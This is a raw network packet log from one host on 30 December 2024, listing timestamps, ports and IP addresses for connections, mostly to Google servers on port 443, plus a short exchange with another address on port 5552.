                                                                                                                                                                            Dec 30, 2024 11:49:19.126898050 CET49775443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.128155947 CET49775443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.133476973 CET49774443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:19.133511066 CET44349774142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.133876085 CET44349774142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.133929014 CET49774443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:19.134469986 CET49774443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:19.135188103 CET49773443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.135202885 CET44349773142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.136109114 CET44349773142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.136188984 CET49773443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.137664080 CET49773443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.171327114 CET44349775142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.175331116 CET44349774142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.179342031 CET44349773142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.459162951 CET44349773142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.459228039 CET44349773142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.459249020 CET49773443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.459291935 CET49773443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.459825039 CET49773443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.459845066 CET44349773142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.460517883 CET49778443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:19.460586071 CET44349778142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.460838079 CET49779443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.460853100 CET49778443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:19.460884094 CET44349779142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.460933924 CET49779443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.461292028 CET49779443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.461309910 CET44349779142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.461796999 CET49778443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:19.461821079 CET44349778142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.470787048 CET44349775142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.470875978 CET49775443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.471817970 CET44349775142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.471882105 CET44349775142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.471896887 CET49775443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.471955061 CET49775443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.473691940 CET49775443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.473691940 CET49775443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.473717928 CET44349775142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.474633932 CET49775443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.474633932 CET49780443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.474678993 CET44349780142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.475337029 CET49780443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.475697041 CET49780443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:19.475713968 CET44349780142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.496907949 CET44349774142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.496959925 CET44349774142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.497011900 CET49774443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:19.497033119 CET44349774142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.497067928 CET49774443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:19.497073889 CET44349774142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.497085094 CET44349774142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.497107983 CET49774443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:19.497128010 CET49774443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:19.500052929 CET49774443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:19.500075102 CET44349774142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.500564098 CET49781443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:19.500593901 CET44349781142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:19.500983953 CET49781443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:19.501260042 CET49781443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:19.501271963 CET44349781142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.060987949 CET44349778142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.061115980 CET49778443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:20.062074900 CET49778443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:20.062089920 CET44349778142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.062310934 CET49778443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:20.062318087 CET44349778142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.080107927 CET44349779142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.080213070 CET49779443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:20.087049961 CET49779443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:20.087058067 CET44349779142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.087301016 CET49779443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:20.087305069 CET44349779142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.106949091 CET44349780142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.107074022 CET49780443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:20.107661009 CET49780443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:20.107670069 CET44349780142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.107749939 CET49780443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:20.107764006 CET44349780142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.130537987 CET44349781142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.130603075 CET49781443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:20.131635904 CET49781443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:20.131644964 CET44349781142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:20.131814957 CET49781443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:20.131820917 CET44349781142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.182106018 CET44349788142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.182698011 CET44349789142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.182765961 CET49789443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:22.196762085 CET49789443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:22.196778059 CET44349789142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.197345018 CET49789443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:22.197354078 CET44349789142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.246944904 CET44349787142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.247051001 CET49787443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:22.247540951 CET49787443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:22.247548103 CET44349787142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.247746944 CET49787443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:22.247755051 CET44349787142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.336606026 CET44349790142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.336664915 CET49790443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:22.337357044 CET49790443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:22.337363005 CET44349790142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.337666988 CET49790443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:22.337671995 CET44349790142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.464723110 CET49788443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:22.464854002 CET49789443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:22.464880943 CET49787443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:22.464911938 CET49790443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:22.467205048 CET49794443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:22.467252970 CET44349794142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.467325926 CET49794443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:22.666997910 CET49795443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:22.667043924 CET44349795142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.667108059 CET49795443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:22.667736053 CET49794443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:22.667768002 CET44349794142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.668750048 CET49795443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:22.668764114 CET44349795142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.887182951 CET497965552192.168.2.8172.111.138.100
                                                                                                                                                                            Dec 30, 2024 11:49:22.892002106 CET555249796172.111.138.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:22.892082930 CET497965552192.168.2.8172.111.138.100
                                                                                                                                                                            Dec 30, 2024 11:49:22.892518997 CET497965552192.168.2.8172.111.138.100
                                                                                                                                                                            Dec 30, 2024 11:49:22.897339106 CET555249796172.111.138.100192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.278582096 CET44349794142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.278666019 CET49794443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.279052973 CET44349795142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.279499054 CET49794443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.279510975 CET44349794142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.279547930 CET49795443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.281958103 CET49794443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.281965971 CET44349794142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.282934904 CET49795443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.282952070 CET44349795142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.283453941 CET49795443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.283461094 CET44349795142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.655534983 CET44349795142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.657453060 CET49795443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.658499956 CET44349795142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.658560991 CET44349795142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.658718109 CET49795443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.662404060 CET44349794142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.665426970 CET49794443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.665456057 CET44349794142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.666795015 CET44349794142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.666860104 CET49794443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.688188076 CET49795443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.688221931 CET44349795142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.688237906 CET49795443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.689059019 CET49795443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.692012072 CET49794443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.692042112 CET44349794142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.692657948 CET49798443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:23.692699909 CET44349798142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.692894936 CET49799443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.692899942 CET49798443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:23.692934990 CET44349799142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.693000078 CET49800443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.693037987 CET44349800142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.693099976 CET49800443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.693100929 CET49799443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.693327904 CET49798443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:23.693341017 CET44349798142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.693396091 CET49800443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.693406105 CET44349800142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.693506002 CET49799443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:23.693516016 CET44349799142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.728892088 CET49797443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:23.728931904 CET44349797142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:23.729002953 CET49797443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:24.052145004 CET49797443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:24.052177906 CET44349797142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:24.296058893 CET44349800142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:24.296124935 CET49800443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:24.298932076 CET44349798142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:24.299041986 CET49798443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:24.301578999 CET44349799142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:24.301647902 CET49799443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:24.313327074 CET49800443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:24.313350916 CET44349800142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:24.313669920 CET49800443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:24.313683033 CET44349800142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:24.314264059 CET49798443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:24.314279079 CET44349798142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:24.316934109 CET49798443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:24.316945076 CET44349798142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:24.317260027 CET49799443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:24.317284107 CET44349799142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:24.317419052 CET49799443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:24.317425966 CET44349799142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:24.657661915 CET44349797142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:24.657721043 CET49797443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:24.658337116 CET49797443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:24.658351898 CET44349797142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:24.658508062 CET49797443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:24.658514977 CET44349797142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:24.669135094 CET44349800142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:24.669192076 CET49800443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:24.669213057 CET44349800142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:24.669251919 CET49800443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:24.670140982 CET44349800142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:26.420696020 CET44349808142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:26.421051025 CET44349808142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:26.421360970 CET49808443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:26.421674967 CET49808443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:26.424454927 CET49806443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:26.424478054 CET44349806142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:26.424824953 CET44349806142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:26.425818920 CET49806443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:26.425818920 CET49806443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:26.463325977 CET44349808142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:26.467330933 CET44349806142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:26.741084099 CET44349811142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:26.741437912 CET49811443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:26.767503023 CET44349808142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:26.768300056 CET49808443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:26.768323898 CET44349808142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:26.768373966 CET49808443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:26.773382902 CET44349808142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:26.773433924 CET49808443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:26.773454905 CET44349808142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:26.773499966 CET49808443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:26.783030033 CET49811443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:26.783051968 CET44349811142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:26.783310890 CET49811443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:26.783329964 CET44349811142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:26.784024954 CET44349806142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:26.784168005 CET49806443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:26.784188032 CET44349806142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:26.784991026 CET44349806142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:26.785044909 CET49806443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:26.785044909 CET49806443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:26.786309004 CET49806443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:26.786343098 CET44349806142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:26.786890984 CET44349807142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:26.786950111 CET44349807142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:26.786958933 CET49807443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:26.786992073 CET44349807142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:26.787005901 CET49807443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:26.787034035 CET49807443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:26.787040949 CET44349807142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:26.787055969 CET44349807142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:26.787081957 CET49807443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:26.787106991 CET49807443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:26.804327011 CET49808443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:26.804363966 CET44349808142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:26.804560900 CET49807443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:26.804598093 CET44349807142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:26.805361032 CET49812443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:26.805397987 CET44349812142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:26.805566072 CET49812443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:26.806101084 CET49812443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:26.806109905 CET44349812142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:26.806473970 CET49813443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:26.806521893 CET44349813142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:26.806571007 CET49813443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:26.809195042 CET49814443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:26.809221029 CET44349814142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:26.809751034 CET49814443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:26.835700035 CET49813443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:26.835741997 CET44349813142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:26.837601900 CET49814443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:26.837620974 CET44349814142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:27.150585890 CET44349811142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:27.150685072 CET44349811142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:27.150753975 CET49811443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:27.150787115 CET44349811142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:27.151535034 CET44349811142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:27.151596069 CET49811443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:27.162740946 CET49811443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:27.162776947 CET44349811142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:27.163352013 CET49815443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:27.163417101 CET44349815142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:27.163475037 CET49815443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:27.163760900 CET49815443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:27.163779974 CET44349815142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:27.406614065 CET44349812142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:27.407535076 CET49812443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:27.441915035 CET49812443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:27.441924095 CET44349812142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:27.444423914 CET49812443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:27.444432974 CET44349812142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:27.448065996 CET44349814142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:27.448163986 CET49814443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:27.448697090 CET44349813142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:27.448740005 CET49814443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:27.448745966 CET44349814142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:27.448775053 CET49813443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:27.449369907 CET49814443192.168.2.8142.250.185.78
                                                                                                                                                                            Dec 30, 2024 11:49:27.449376106 CET44349814142.250.185.78192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:27.454750061 CET49813443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:27.454763889 CET44349813142.250.185.161192.168.2.8
                                                                                                                                                                            Dec 30, 2024 11:49:27.455365896 CET49813443192.168.2.8142.250.185.161
                                                                                                                                                                            Dec 30, 2024 11:49:27.455372095 CET44349813142.250.185.161192.168.2.8
